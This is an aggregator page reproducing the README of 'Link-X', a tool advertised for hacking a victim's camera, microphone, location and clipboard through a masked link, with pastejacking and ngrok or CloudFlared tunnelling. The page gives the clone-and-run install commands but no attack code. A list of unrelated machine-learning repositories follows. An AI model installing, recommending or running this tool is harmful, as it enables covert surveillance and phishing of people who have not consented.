Hack Camera, Microphone, Location, Clipboard With Just a Link. Also, Get Many Details About Victim's Device. And So On...

Related tags

Deep LearningLink-X
Overview

Link-X

An Automated Tool to Hack Victim's Camera, Microphone, Location, Clipboard. Has 2 Extra Features.

Version 1.1 Update

  • Fixed Some Major Bugs
  • Data Saving Directory Changed To Storage Folder

    Features

  • Hack Camera
  • Hack Microphone
  • Hack Clipboard
  • Hack Location
  • Get So Many Details about Victim's Device. As much as Possible...
  • Prank Victim Using PasteJacking
  • Supports Custom HTML page to Show to Victim.
  • Supports URL Masking

    Supported Port Forwardings

  • Localhost
  • CloudFlared
  • Ngrok

    Installation Commands

    apt update -y
    apt upgrade -y
    pkg install python git -y
    git clone https://github.com/Toxic-Noob/Link-X
    cd Link-X
    bash setup.sh
    python link-x.py
    

    Note

    [*] USE IT, AT YOUR OWN RISK

    [*] ToxicNoob is not Responsible for Any Misuse

    Contact

    [*] Contact with Me via Email

    [email protected]

    Tool ScreenShots :

    Link-X 1 Link-X 2 Link-X 3 Link-X 4

    Visitors :

    Visitor Count

  • Owner
    ToxicNoob
    From an Ordinary country, I'm an Extraordinary Person.
    ToxicNoob
    Evaluating different engineering tricks that make RL work

    Reinforcement Learning Tricks, Index This repository contains the code for the paper "Distilling Reinforcement Learning Tricks for Video Games". Short

    Anssi 15 Dec 26, 2022
    Official pytorch implementation of the AAAI 2021 paper Semantic Grouping Network for Video Captioning

    Semantic Grouping Network for Video Captioning Hobin Ryu, Sunghun Kang, Haeyong Kang, and Chang D. Yoo. AAAI 2021. [arxiv] Environment Ubuntu 16.04 CU

    Hobin Ryu 43 Nov 25, 2022
    HiFi++: a Unified Framework for Neural Vocoding, Bandwidth Extension and Speech Enhancement

    HiFi++ : a Unified Framework for Neural Vocoding, Bandwidth Extension and Speech Enhancement This is the unofficial implementation of Vocoder part of

    Rishikesh (ऋषिकेश) 118 Dec 29, 2022
    Python Wrapper for Embree

    pyembree Python Wrapper for Embree Installation You can install pyembree (and embree) via the conda-forge package. $ conda install -c conda-forge pyem

    Anthony Scopatz 67 Dec 24, 2022
    Extending JAX with custom C++ and CUDA code

    Extending JAX with custom C++ and CUDA code This repository is meant as a tutorial demonstrating the infrastructure required to provide custom ops in

    Dan Foreman-Mackey 237 Dec 23, 2022
    Code repository for "Stable View Synthesis".

    Stable View Synthesis Code repository for "Stable View Synthesis". Setup Install the following Python packages in your Python environment - numpy (1.1

    Intelligent Systems Lab Org 195 Dec 24, 2022
    Localizing Visual Sounds the Hard Way

    Localizing-Visual-Sounds-the-Hard-Way Code and Dataset for "Localizing Visual Sounds the Hard Way". The repo contains code and our pre-trained model.

    Honglie Chen 58 Dec 07, 2022
    Code for ECCV 2020 paper "Contacts and Human Dynamics from Monocular Video".

    Contact and Human Dynamics from Monocular Video This is the official implementation for the ECCV 2020 spotlight paper by Davis Rempe, Leonidas J. Guib

    Davis Rempe 207 Jan 05, 2023
    Spatial Contrastive Learning for Few-Shot Classification (SCL)

    This repo contains the official implementation of Spatial Contrastive Learning for Few-Shot Classification (SCL), which presents of a novel contrastive learning method applied to few-shot image class

    Yassine 34 Dec 25, 2022
    GAN-STEM-Conv2MultiSlice - Exploring Generative Adversarial Networks for Image-to-Image Translation in STEM Simulation

    GAN-STEM-Conv2MultiSlice GAN method to help covert lower resolution STEM images generated by convolution methods to higher resolution STEM images gene

    UW-Madison Computational Materials Group 2 Feb 10, 2021
    Testing and Estimation of structural breaks in Stata

    xtbreak estimating and testing for many known and unknown structural breaks in time series and panel data. For an overview of xtbreak test see xtbreak

    Jan Ditzen 13 Jun 19, 2022
    Source for the paper "Universal Activation Function for machine learning"

    Universal Activation Function Tensorflow and Pytorch source code for the paper Yuen, Brosnan, Minh Tu Hoang, Xiaodai Dong, and Tao Lu. "Universal acti

    4 Dec 03, 2022
    Using VapourSynth with super resolution models and speeding them up with TensorRT.

    VSGAN-tensorrt-docker Using image super resolution models with vapoursynth and speeding them up with TensorRT. Using NVIDIA/Torch-TensorRT combined wi

    111 Jan 05, 2023
    Official implementation of DreamerPro: Reconstruction-Free Model-Based Reinforcement Learning with Prototypical Representations in TensorFlow 2

    DreamerPro Official implementation of DreamerPro: Reconstruction-Free Model-Based Reinforcement Learning with Prototypical Representations in TensorFl

    22 Nov 01, 2022
    Free Book about Deep-Learning approaches for Chess (like AlphaZero, Leela Chess Zero and Stockfish NNUE)

    Free Book about Deep-Learning approaches for Chess (like AlphaZero, Leela Chess Zero and Stockfish NNUE)

    Dominik Klein 189 Dec 21, 2022
    AdaSpeech 2: Adaptive Text to Speech with Untranscribed Data

    AdaSpeech 2: Adaptive Text to Speech with Untranscribed Data [WIP] Unofficial Pytorch implementation of AdaSpeech 2. Requirements : All code written i

    Rishikesh (ऋषिकेश) 63 Dec 28, 2022
    CMT: Convolutional Neural Networks Meet Vision Transformers

    CMT: Convolutional Neural Networks Meet Vision Transformers [arxiv] 1. Introduction This repo is the CMT model which impelement with pytorch, no refer

    FlyEgle 83 Dec 30, 2022
    OptNet: Differentiable Optimization as a Layer in Neural Networks

    OptNet: Differentiable Optimization as a Layer in Neural Networks This repository is by Brandon Amos and J. Zico Kolter and contains the PyTorch sourc

    CMU Locus Lab 428 Dec 24, 2022
    simple demo codes for Learning to Teach with Dynamic Loss Functions

    Learning to Teach with Dynamic Loss Functions This repo contains the simple demo for the NeurIPS-18 paper: Learning to Teach with Dynamic Loss Functio

    Lijun Wu 15 Dec 30, 2021
    pytorchのスライス代入操作をonnxに変換する際にScatterNDならないようにするサンプル

    pytorch_remove_ScatterND pytorchのスライス代入操作をonnxに変換する際にScatterNDならないようにするサンプル。 スライスしたtensorにそのまま代入してしまうとScatterNDになるため、計算結果をcatで新しいtensorにする。 python ver

    2 Dec 01, 2022